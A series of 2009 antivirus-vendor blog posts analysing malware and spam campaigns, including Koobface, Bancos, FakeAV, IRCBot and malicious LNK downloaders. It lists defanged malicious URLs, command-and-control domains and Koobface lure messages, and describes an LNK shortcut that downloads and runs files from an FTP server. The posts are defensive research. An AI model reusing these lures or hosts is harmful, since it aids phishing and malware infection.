Published: June 29 2009, 05:42 AM | no comments
by Rossano Ferraris

Spammers have used the recent political controversy that surrounds the Italian Prime Minister
Silvio Berlusconi to lure and trap Italian speaking people via an email spam (see Figure 1 and
Figure 2). Italian people who love gossip about public people may be particularly susceptible to
this type of email.



Figure 1 - Spammed Email

The English translation is:

“Have you seen what our Prime Minister Silvio Berlusconi is doing? Have you followed his story
with the escort?
Thanks to a journalist of LEGGO, we have got the opportunity to see our Premier together with
his escort girl recently appeared on newspapers. If you want to see them, click on the link below:
hxxp://you[BLOCKED].com/watchv=W3k9pMtrccQ.html

TO SEE THE VIDEO YOU NEED TO INSTALL THE FOLLOWING CODEC…”

If we examine the email closely, we see that the email pretends to come from Youtube.
However, the email really comes from a certain Youtorube.com (see Figure 1 and Figure 2) which
is hosted on a web server located in Florida with IP address 64.71.35.20.


Figure 2 - Email Header

A link in the email will redirect us to a malicious website “youtorube.com” that asks the user to
install a new codec to view the video (Figure 3):


Figure 3 - Host website

The new codec is called “wmpcodec.exe,” and CA AV detects this file as the worm
“Win32/IRCBot.OQ”, and blocks it from running.

Additional Information on Win32/IRCBot.OQ

We managed to follow the communication between the malware file and its IRC server, from
there we found that the bot malware is monitoring keystrokes, passwords, websites visited and
windows opened in the infected system.

Win32/IRCBot.OQ sends a log of computing activities of an infected system in the IRC server. It
makes the activity log visible to the malware author and also to other infected systems.
The IRC channel becomes a log file of activities of all infected machines.

Figure 4 shows how each activity was logged in the IRC channel:


Figure 4 - Communication capture in the IRC channel

It logs usernames and passwords when an infected system accesses a website that contains
'login.php' in the URL.

In addition, it attempts to download other malware to the infected system, which CA detects as
Win32/PolyCrypt!packed.


 

Thanks to Zarestel Ferrer for his contribution to the description of Win32/IRCBot.OQ malware

Published: June 29 2009, 02:37 PM | no comments
by Aaron Faloon

This week in CA Research Labs as we were receiving new variants of the popular Bancos Trojan we were able to make a successful attempt at tracing one of these variants back to its distribution point.

This distribution point is a web server located in the state of New Jersey in the United States of America. The web server is associated with a local school in the area and is used to host it’s website to the public.

An interesting point to note is that the school is presently closed for maintenance and equally important the school has dismissed for the summer.

Was this timing intentional by the malware authors in order to go undetected by the people involved with monitoring the schools website and network or purely just coincidence?

[Figure 1 - School Website hosted on web server]

 

[Figure 2 –Bancos Malware stored on compromised web server]

As well as hosting the schools website we can see that the compromised web server is also hosting Bancos malware. Here we can see the malware files that are stored in the directory on the compromised web server. These files are used to resemble legitimate banking applications in order to fool the user into entering their banking information which is then stolen by the attackers.

Anatomy of the Attack

[Figure 3 – Anatomy of the attack]

Step 1 - The Users machine gets infected by one of the Bancos download agents. These agents are detected by CA as Win32/Bancos.ORU and Win32/Bancos.ORV.

Step 2 - The infected machine will now automatically connect to the compromised web server under control of the download agents.

Step 3 - Once connected to the compromised web server the download agents will download Win32/Bancos.ONW onto the user’s machine.

The system is now infected with a Bancos Trojan which can steal sensitive information relating to the users banking habits.

Here we can see the download agents (Win32/Bancos.ORU and Win32/Bancos.ORV) contacting the compromised web server in order to download the Bancos Trojan onto the users system.

[Figure 4 – Contacting the web server and downloading files]

We can see from Figure 4 that an executable (sidebr.exe) and an image file (c1.bmp) are downloaded to the infected user’s machine. Many more files are downloaded to create the Bancos Trojan application. A few of these files can be seen in Figure 2.

CA currently detects the downloaded Bancos Trojan as Win32/Bancos.ONW.

CA also recommends keeping your security software up to date in an attempt to avoid this infection of Bancos Malware taking place on your system.

We have also notified the administrator of the compromised web server regarding this issue.

Please read our blog on Banking Trojans - Tips and Tricks for more information on the Bancos Trojan.

Published: June 23 2009, 01:20 AM | no comments
by Zarestel Ferrer

It is surprising to see 16-bit Windows-based malware now that we have 64-bit technology.
Recently we encountered a malware that uses the 16-bit New Executable file format and we detect it as Win16/Tanglinko.A.

                                [Figure 1 – IDA Pro Analysis of the file format]

As you can see in Figure 1, IDA Pro identified the File Format to be “New Executable (NE) Windows”, the Application type as “Console GUI Executable DLL 16 bit” and the file’s Expected Windows Version as “3.0”. Currently the version for new Windows Operating systems such as  Windows Vista is 6.0 and Windows 7 is 6.1 so you can see how old the file format is!

Does this mean the malware is old just because it uses an old file type? Not at all, this is new malware. However, malware authors just can’t leave the past behind and use old tricks when developing new malware. Here is the Virus Total scan result of 21st June, 2009.

                                [Figure 2 – Malware dropping files with directory names]

Now, what does this malware do? Apart from its file format, nothing fancy really. However, it is just as annoying as any other average malware that we encounter at present. It disables the clipboard, which means a user cannot perform a Copy/Paste operation, and terminates some Windows applications if they have any of the following strings in their Window title.

• Run
• Search Results
• Select Files and Folders
• System Configuration Utility
• Folder Options
• Display Properties
• Registry Editor
• Command Prompt
• C:\Windows\System32

In case your system has been infected and you want to manually remove the infection, a simple search, using Process Explorer, for the malware file (usually is SYSTIM32.EXE) can help you identify the malware. Please make sure you terminate the NTVDM.EXE containing SYSTIM32.exe, terminating the wrong process may give you unwanted results.

                                                [Figure 3 – Malware Search]

As you can see it runs under NTVDM.EXE (NT Virtual DOS Machine), which is a Win16 subsystem process under NT-based Windows Operating Systems.

To be on the safe side always keep your CA security software updated.

Published: June 16 2009, 11:22 AM | 2 Comment(s)
by Rossano Ferraris

It’s been awhile since I saw a fake update email which looked like it came from Microsoft security laboratories.  Some people complained to me about a strange email that asked the user to update their machines because of a recent outbreak of the well-known Conficker worm (see Figure 1 and Figure 2).

Figure 1 - Fake Email (part 1)

Figure 2 - Fake Email (part 2)

Let’s take a look at the body of this email, which is very well written and uses persuasive language. The lure in the message is a Microsoft removal tool that will scan and clean the user’s machine. 
However, I notice a phrase that says “you are advised to disable your already existing antivirus software.”  My spam email reveals itself when I move my mouse pointer over the link “click here to download the removal tool” and I discover that the URL redirects the browser to a Russian server (windowsupdate.microsoft.com.ssl3.pop3.ru), which hosts the remtool_conf.exe.

If we look at the header, we see the following:

Figure 3 - Email Header

The email comes from a certain Microsoft[dot]ssl[dot]com whose IP address is 38.100.66.185. This IP address originates from a server which is located in Texas and is not a Microsoft server.

During the analysis, I download and install remtool_conf.exe:


Figure 4 - Removal Tool License

Then I click on “Accept” and the tool - which seems to belong to Symantec - starts to scan my machine:

Figure 5 - Removal Tool Software

The fake software scans the entire machine, and establishes a hidden connection to the host makemymoneys.com (Figure 6) from which it attempts to download and install the malicious file winupdate.exe, which is detected by CA Security products as “DelfInject CX.”

Figure 6 - makemymoneys.com host hidden connection

CA Security products detect the fake removal tool as “FakeScan A” warning against it and have the ability to remove it.

Although there has been a decrease in the number of fake Microsoft update emails, the current fake emails are more sophisticated and use a very high profile social engineering technique to lure and trap people.  The CA Research team advises users to be aware of these types of spam message and to update their anti-malware products on a daily basis.

Published: June 16 2009, 01:17 AM | no comments
by Ricardo Robielos III

Social networking sites are extremely popular these days and, not surprisingly, the latest variant of Win32/Koobface is still taking advantage of this popularity by using these sites as an attack vector.

A variant of Koobface is currently active (as of this posting), sending massive spam messages in several social networking sites such as FaceBook.com, MySpace.com, Friendster.com, Hi5.com, Bebo.com, Fubar.com, MyYearbook.com and Tagged.com.
 
This variant connects to the malicious server "UPR15MAY.COM" to get the information details for its spam messages to be sent to contacts of affected users who access any of the above mentioned social networking sites, with sample messages sent shown below:

For FaceBook.com:

[Sample Facebook Post]
 

[Sample Facebook Message]

For Facebook, this malware connects to "upr15may.com/fb" to generate the spam details to be sent.

For MySpace.com:

[Sample MySpace Message]

For MySpace, this malware connects to "upr15may.com/ms" to generate the spam details to be sent.

For Friendster.com:

[Sample Friendster Message]

For Friendster, this malware connects to "upr15may.com/fr" to generate the spam details to be sent.

For Hi5.com:

[Sample Hi5 Message]

For Hi5, this malware connects to "upr15may.com/hi" to generate the spam details to be sent.

For Bebo.com:

[Sample BeBo Message]

For Bebo, this malware connects to "upr15may.com/be” to generate the spam details to be sent.

For Fubar.com:

[Sample Fubar Message]
 

For Fubar, this malware connects to "upr15may.com/fu" to generate the spam details to be sent.

For MyYearBook.com:

[Sample MyYearbook Message]

For MyYearbook, this malware connects to "upr15may.com/yb" to generate the spam details to be sent.

For Tagged.com:

[Sample Tagged Message]

For Tagged, this malware connects to "upr15may.com/tg" to generate the spam details to be sent.  

We did a simple curl POST command to the malicious server to obtain a list of spam messages that this worm may generate, giving us the following details:

Title/Subject: (Any of the following)

•  :)
•  ;)
•  HA-HA-HA!!
•  L.O.L.
•  lol
•  OMFG!!!
•  W.O.W.
•  WOW

Text/Body: (Any of the following)

•  A--ha-ha, i saw yoour ass in the internet!! lol
•  Be more careful next time and get caught again!
•  Can anyone get busted, or is it just you?
•  Dammn! Haaven’t you seeen our secrett caamera?
•  Enjoy your first acting experience in our movie.
•  Got yoou! Ha--ha, now watcch and crry!
•  Hey ddude, yoou’re on candiid cammera!
•  I caan’t beelieve you diddn’t see the ssecret cammera!
•  Laaugh at oother people?? LLook at yoursself!
•  Man, you're great! See yourself naked, lol XD
•  Oh, what a shame, your ass is on our tape.
•  Prrivate viideo wwith yyou. funnny
•  YYou're so ppretty ggood on thhis vvideo.

… Or see the other list here

Malicious redirected Links: (Any of the following, please do not visit this sites)

•  hxxp://28680.yoyo.pl/extrimevideo/
•  hxxp://anilkapoor.net/amaizingdemonstration/
•  hxxp://baldom.yoyo.pl/privatevids/
•  hxxp://budget.user.kz/uncensoredvideo/
•  hxxp://canibals.ic.cz/coolclips/
•  hxxp://kuzmi4.110mb.com/uncensoredmovie/
•  hxxp://lambord.ic.cz/publicmovie/
•  hxxp://mediawork.ru/uncensoredmovie/
•  hxxp://punks.110mb.com/publicdvd/
•  hxxp://quicksilverr.110mb.com/freefilm/
•  hxxp://topwoman.intway.info/publictube/
•  hxxp://uc2qasimabad.com/freeclips/
•  hxxp://www.tangoballet.com/uncensoredvids/
•  hxxp://yarentextil.com/funnyfilm/
•  hxxp://zbanglabd.com/uncensoredshow/
•  hxxp://zidacilbin.tym.cz/privatefilm/
•  hxxp://zkouskafora.ic.cz/funnyfilm/
•  hxxp://zoghetaze.com/amaizingmovie/

… Or see the other list here

The spam messages contain a malicious link that accesses a Java Script. (See figure below. We detect this Java Script as a JS/Redirector variant)

This JavaScript redirects web browsers to a fake Video site ("YuoTube" misspelled) to download a file "setup.exe", which is also a variant of Win32/Koobface. This other variant may also download other malicious files such as Rogue Antivirus programs.

We advise users to avoid opening these spam messages when visiting their favorite social networking site and to always keep their CA Antivirus Product up-to-date with the latest signature files.

Published: June 15 2009, 12:27 AM | no comments
by Methusela Cebrian Ferrer

  “A picture’s worth a thousand words” – Chinese proverb

                                     Figure 01 – Visualizing OS X threat internet distribution

For the past couple of days, I have noticed that there has been an aggressive push of Mac trojans specifically OSX/Jahlav variants.

As shown in Figure 01, the prevalence of OS X threats is primarily distributed over the internet - mostly found from Google search. I have captured few examples for visualization to show how it is perpetrated by organized gangs. The green area is denoted as legitimate source where red lines links to affiliate websites and thereafter re-directed to malicious servers.

Another note worthy event is Apple’s Worldwide Developers Conference in San Francisco (WWDC09 Jun 08-12) - so it got me wondering if these attackers are trying to capture attention or if it's just business as usual.

Although, what’s clear to me now is that everyday there are Mac users around the world asking for help about this threat. Yes, it requires user intervention to install but unfortunately the level of sophistication involved to lure users is definitely effective. 

Mac users are advised to download and install applications from trusted source.

Stay safe! 

Additional Reading:

http://ithreats.net/2009/06/10/updated-maccinema/ 

http://community.ca.com/blogs/securityadvisor/archive/2009/03/23/latest-mac-threat-maccinema.aspx

Published: June 12 2009, 01:57 AM | no comments
by Mary Grace Gabriel

CA ISBU Research Lab receives a large number of malicious samples on a daily basis, many of which are found to be Rogue Antivirus applications belonging to the extremely prevalent malware family, Win32/FakeAV.  

I encountered an interesting sample of Win32/FakeAV recently, because it is not the usual Rogue Antivirus applications we come across in our labs. This time around, this variant imitates Microsoft Windows Malicious Software Removal Tool (MSRT), as well as promoting Microsoft Office upgrade and other trusted Antivirus products.

Fake Microsoft MSRT Warnings

When the installation package is executed, it will display the fake alert in the system tray as seen in Figure 01:

    
                                                [Figure 01 – Fake Alert System Tray]

Then, it will display the fake GUI for Microsoft Windows Malicious Software Removal Tool scanning your system and it will display the scan result as shown in Figure 02:

    
                                                  [Figure 02 – Fake MSRT Result]

When the user clicks the Finish button, it will display the following GUI promoting trusted Antivirus products as shown in Figure 03:

    
                                                     [Figure 03 – AV products]

However, when the user clicks the Cancel button, it will display another fake alert on system tray as seen on Figure 04:

    
                                               [Figure 04 – Fake Alert System Tray]

Another strategy to convince the user to purchase the trusted Antivirus application that it offers is to display a fake error when any of the following Peer-To-Peer applications is executed:

• BearShare.exe
• FrostWire.exe
• LimeWire.exe
• Phex.exe
• Phex_debug.exe
• Shareaza.exe

Example of a fake error message displayed containing a misspelled word:
 
    
                                                          [Figure 05 – Fake error]

Fake Windows Security Center Warning

Another strategy is by imitating the Windows Security Warning.

First, it will display another fake alert in the system tray as seen on Figure 06 with another misspelled word:
 
    
                                 [Figure 06 – Fake Windows Security Center Warning]

Second, it will pop the following GUI that imitates the Windows Security Center:
 
    
                                        [Figure 07 – Fake Windows Security Center GUI]

Clicking the Recommendations button, will take you to the website www.oem-micro-store.com/winadvisor_avir which is currently down as of the moment.

Other Dubious Offers

This variant does not only promote trusted Antivirus products, it also offers other products such as Microsoft Office upgrade.

When Microsoft Word is opened, it will display the following warning offering the user to purchase a dubious Microsoft Office upgrade, see Figure 08:
 
    
                                                 [Figure 08 – Microsoft Word warning]

When the Yes button is click, it will take you to the following website to purchase the upgrade:
 
    
                                                 [Figure 09 – Microsoft Word upgrade]

Always remember to keep updating your CA security products' signatures.

Till next time…

Published: June 11 2009, 03:56 AM | no comments
by Ricardo Robielos III

A new Email is circulating disguising itself as a legitimate email from Twitter, Hi5, Amazon and Hallmark. This email has an attachment containing a mass mailing worm and also has the capability to propagate via Peer to Peer (P2P) application such as Limewire, Tesla, WinMX, FrostWire and Grokster. We detect this mass mailing worm as Win32/Fruspam variant.

Sample Emails are the following:

Twitter Email

From: invitations@twitter.com
Subject: Your friend invited you to twitter!
Attachment: Invitation Card.zip

Hi5 Email

From: invitations@hi5.com
Subject: Jessica would like to be your friend on hi5!
Attachment: Invitation Card.zip

 
Amazon Email

From: order-update@amazon.com
Subject: Shipping update for your Amazon.com order 254-78546325-658742
Attachment: Shipping documents.zip

Hallmark Email

From: e-cards@hallmark.com
Subject: You have received A Hallmark E-Card!
Attachment: Postcard.zip

It also downloads images from the following legitimate websites (Twitter.com, hi5.com, amazon.com and hallmark.com) and uses the images to construct the spam email.

We advise users to beware of these kinds of emails and ensure that your CA Security Products are using the latest signatures.

Published: June 10 2009, 04:02 AM | no comments
by Kenneth Yu

Recently, we have received several emails that seem to target specific companies, advising them on the progress of a wire transfer that they have supposedly followed up on. Figure 1 below shows a sample email.

                                                        [Figure 1: Sample Email]

 Attached to this email is the file “detail.rtf”, which supposedly contains the details about this wire transfer.  When you open the file in MS Word, you will see the fake error message shown in Figure 2 below:

                                                                [Figure 2: Content]

If you double-click on the message as suggested you will unwittingly execute the embedded malware file, which CA products detect as Win32/SillyDl.NUU.

Please be wary about opening emails that have unknown attachments and always update your signature files.

Published: June 01 2009, 08:53 PM | no comments
by Ricardo Robielos III

Recently at CA Research Labs we have received many spammed emails containing a malicious attachment. This spam disguises itself as a notification email from the United Parcel Service of America (UPS), advising you that the package you sent could not be delivered.

The email contains the following Body:

Hello!

We were not able to deliver postal package you sent on the 14th of May in time
because the recipient's address is not correct.
Please print out the invoice copy attached and collect the package at our office.

Your United Parcel Service of America

It contains a malicious zipped file attachment with the filename starting with any of the following strings:

• UPSTRACKING_
• UPSDocs_
• UPSZN_

The executable inside the zip file has an icon similar to a Microsoft Office Excel file. 

Below are some sample emails showing the different Attachment filenames:

We detect the malicious executable file attachment as a Win32/Donloz variant.

When executed, Win32/Donloz connects to the malicious server “dollarpoint.ru”  to download other malicious files.

At the time of writing, the downloaded malicious files are Win32/FakeAlert variants that may change how the desktop of the infected system looks, as shown below.

The Win32/FakeAlert may also open a website that points to rogue Antivirus software called “AntivirusXP Pro”

However, this malware technique is not new and we have received similar spam messages in the past, using the same executable file icon  but referring to Western Union instead of UPS (possibly the same malware authors).

We advise users to beware of these kinds of emails and ensure that your CA Security Products are using the latest signatures.

Published: May 31 2009, 08:54 PM | no comments
by Methusela Cebrian Ferrer

According to the Nielsen report Global Faces and Networked Places “social networking has been the global consumer phenomenon of 2008. Two-thirds of the world’s internet population visits a social network or blogging site and the sector now accounts for almost 10% of all internet time”. The report also suggests that interest in social networking has surpassed the popularity of emails.

From an information security perspective, this report concurs with our observations regarding the ever increasing number of online threats we are seeing today. Facebook, as the world’s most popular social networking site, cannot escape the attacks targeting its users. 

Win32/Koobface appeared last year and is a family of worms that target MySpace and Facebook users. Since then, this threat has evolved into different versions where it extends its social networking vector as shown in Figure 01.   

                       

                                         Figure 01 – Koobface redirector script routine


Obviously, this redirector script leads to Koobface malware serving website where it will lure its target users to manually install an executable file as shown in Figure 02.

         Figure 02 – Koobface malware serving website offers users to install Adobe Flash Player Installer. 

Apparently, spamming activity in Facebook has been observed increasing since last week.

For more information on Koobface, please refer to our previous blogs listed below:
•    Healthy Malware Server Now Distributing Koobface
•    From Koobface: One Video Message Received

What about Twitter?  The micro-blogging community is enjoying skyrocketing popularity and according to Nielsen, has reported a 1382% increase of unique visitor over year (Feb 08 – Feb 09). Unfortunately this huge surge in popularity has attracted attackers and we have seen serious attacks such as the Mikeyy worm and hacking incidents; there have also been phishing attack and increasing spam activity. 

Furthermore, we are continuously seeing malware (especially relating to porn) and spam distribution through bogus Blogspot blog profiles as shown in Figure 03.  

                                    Figure 03 – Bogus blog profiles

Security researchers are now dealing with different attack vectors and varying technical difficulty. Organized cyber-criminals are mainly builing these attacks through automation to enable massive malware distribution and implementation of server side polymorphism of binaries (EXE, PDF, SWF and etc...) to avoid security scanners detection.

Social networks and growing internet content (such as media) have encouraged users to spend longer time in the internet resulting to greater exposure to internet threats and dramatic increase of malwares.  With this, visitors to social networking sites should be on ‘high alert’ for socially engineered tricks to follow links to sites that could be serving malicious content, even from contacts thought to be trusted.

Futhermore, it is very important for everyone participating in social networking activities to report any suspicious or openly malicious activity to keep the internet safe. 

My acknowledgement to Michael MacGuire and Kim Thorogood for their valuable contribution to this blog post.

Published: May 28 2009, 09:53 PM | no comments
by Zarestel Ferrer

Trojan downloaders have become one of the main malware categories to dominate CA’s malware collection this year. Most of the malware is very small, some may say lightweight, and its only purpose is to download other malware.

Multiple Downloads

If a system is infected with malware that has “downloader” capabilities, it’s highly likely that the malware will fetch some more to install on the system. Below is an image of communication between a piece of malware and its server.

                                              [Figure 1 – Downloader contacting server]

As you can see, when a trojan downloader communicates with its server it can result in multiple downloads of potentially malicious files. Accordingly, the affected machine may be exposed to further attacks. This particular behavior is significantly prevalent in crimeware, which is malware that is generated for financial gain.

Some downloaders employ extra checks when communicating with their servers. As shown on the left-side of Figure 1 the malware files can be downloaded via port 88, not the usual port 80, while the right-side of the image shows that the list of malware is only provided when the  required information is sent via POST to the server.

PDF and SWF downloaders

Exploited PDF and SWF files are also in the list of Trojan downloaders and their numbers have increased significantly due to Server-Side Automation that has been built to auto-generate exploited files.

                                     [ Figure 2 – Snippet of Exploited PDF ]

Check out our previous blog, “Malicious PDF Server Alive and Kicking” for more information.

Rogue Security Software Downloaders

Other notable Trojan downloaders are those that download rogue security software and push fake alert messages.

                              [ Figure 3 – Downloader of Fake Antivirus Programs ]

These type of downloaders typically offer something of interest to unsuspecting users such as fake codecs, porn, and keygens. A downloader may also impersonate a legitimate application such as Flash player.

Below is the HTTP access log after a downloader program, disguised as a porn video provider, downloads a fake antivirus program. The downloader opens the porn site using the default internet browser and in the background downloads a fake antivirus program, in this case it is WinPC Defender.

                                       [ Figure 4 – HTTP access log ]

For more information on rogue security software, take a look at our other blogs:

          Spyware Protect 2009 copies malware descriptions
          Double Jeopardy with Privacy Center
          Warning: Dangerous Software – Antivirus XP Pro
          Don’t Get Caught by the XP Police Antivirus!
          Don’t be Fooled by Rogue Software Lifetime Offer

To be on the safe side, be extra cautious with your daily computer activities and remember to always keep your CA security software up-to-date.

Published: May 27 2009, 10:44 PM | no comments
by Methusela Cebrian Ferrer

Amidst the bulk of malicious executables we deal with everyday, there’s an interesting attack vector using Windows Shortcuts - referred to as LNK files due to their file extension of .LNK.

These are small files that contain information such as the name and path of the target program it represents. Additionally, LNK files can also store information about the file attributes of its target program, local and network location and command line arguments.
                                          
                                   
 

A good example of a very common shortcut file you’ll find on the desktop is Internet Explorer. However, visually recognizing whether it is clean or malicious is not an easy task. As a result, you could easily end up executing the file before realizing that it is suspicious.

In recent cases, malicious LNK files were crafted as Trojan downloaders, sometimes disguised as a legitimate file, program or folder to persuade its target victim to execute it.

                                                                    

Figure 03 shows what you would see if you dragged a malicious LNK file to a text editor such as Notepad:
       


In this example, you’ll find a short argument is passed through cmd.exe, which will connect to a malicious FTP server (ftp://g***.vicp.net) to download and execute ntdet.exe in C:\ and pub.vbs in the Windows directory. This is just one example and it demonstrates how any attacker could craft a malicious LNK file by changing its icon and downloader behavior according to their intent.

Furthermore, Windows users may receive this threat through email, browser exploit and/or bundled with other malicious files.

Take extra precautions with this kind of trick by following our recommendations below:

•  Think twice before clicking on a shortcut file. If in doubt, simply drag the file to Notepad and check for any suspicious strings.
•  Include .LNK extensions in your list of unwanted email attachments; this is a must for enterprise email blocking and filtering administration.
  
•  Stay up to date with software patches to avoid exploit attack vectors. 
  
• Make sure your security software is working and uses the latest signature update.
  

Stay Safe!

Published: May 27 2009, 10:19 PM | no comments
by Zarestel Ferrer

Rogue security software often use skins to change its Graphical User Interface (GUI). This is so a new version can be easily created once the previous version is easily recognizable as fake security software. Sometimes the GUI is a replica of legitimate security software to trick unsuspecting users.

Aside from GUIs, rogue security software also illegally copy malware descriptions from the websites of reputable security vendors. Spyware Protect 2009 rogue security software has been spotted to copy descriptions from the CA Spyware Encyclopedia.

Here are some examples, showing CA’s description first, followed by Spyware Protect 2009’s plagiarized version.

CA

Spyware Protect 2009

In both cases the descriptions are brief - coincidence?

Here is another example.

CA

Spyware Protect 2009

CA is not the only site that Spyware Protect 2009 has copied their malware descriptions from but this highlights how desperate the people behind this rogue security software are to trick users.

Since last week this rogue security software is reported to have been massively distributed through compromised and malicious websites so please be observant.
 
CA detects this malware as Win32/SpywareProtect2009. For a list of files and registries dropped by this rogue security software please refer to CA Spyware Encyclopedia description page.

Published: May 20 2009, 12:25 AM | 1 Comment(s)
by Zarestel Ferrer

                                                   [Figure 1 – Privacy Center GUI]

Recently we were investigating “Privacy Center”, rogue security software (scareware) distributed during the wave of the “nude Rihanna photos”, when we saw the following window.

                                   [Figure 2 – Privacy Center’s Transaction Processing page]

As you can see in Figure 2, this rogue security software costs $79.90; not cheap for a fake.
 
So we checked our website to compare the cost of our legitimate software against the cost of Privacy Center. Interestingly, our software costs around the same amount [Figure 3].

CA Internet Security Suite Plus - license valid for up to 5 PCs for $79.99 plus free PC Optimize Scan.

CA Antivirus Plus CA Antispyware 2009 - license valid for up to 3 PCs for $49.99 plus free PC Optimize Scan.

* prices are correct at time of writing

How many times have we all wondered, when shopping, if the more expensive product is superior quality to the cheaper product? The pricing of this rogue software is tapping into those same consumer insecurities. The distributors of Privacy Center have effectively hidden the rogue software in amongst legitimate security products in the same price range.

                              [Figure 3 – CA Internet Security Suite Plus 2009 webpage]

Going back to the “Privacy Center” scareware, we have noticed a couple of fraudulent claims.

"Secure" Page

                                                     [Figure 4 – Secured Logos]

As you can see in Figure 4, the window displays a “Positive SSL Secured Website” logo, which is not what we saw in the background. Using our set of tools to investigate this claim, we noticed that the process is not using HTTP over SSL, nor is it using HTTPS. Instead, as seen in Figure 5 below, it is using standard HTTP.

                                              [Figure 5 – HTTP transaction]

I have experimented by filling in both the personal information and payment information fields. It is NOT surprising that the personal information sent was transmitted in a clear text format as shown from the sniffed transactions below [Figures 6, 7 & 8].

                                           [Figure 6 – NOT Secure Transaction]

                                                [Figure 7 – Packet Stream]

                                      [Figure 8 – Visible Credit Card Details]

The personal information such as first name, last name, city, country, state, address, zip code, email address and phone number are all in clear text. In addition, the payment information such as card number, expiration date and credit card verification (cvv) value are all visible to the sniffer.

In this scenario, not only has the victim been ripped off by the scareware, something far more sinister has happened. The victim’s personal and payment information had been compromised and could now be used for further scams.

Privacy Center is detected by CA as Win32/PrivacyCenter.A and most of its components are detected as Win32/FakeAV variants.

Protect yourself by keeping your CA Security Products up to date!

*Thanks to Kim Thorogood for her valuable contribution to this blog entry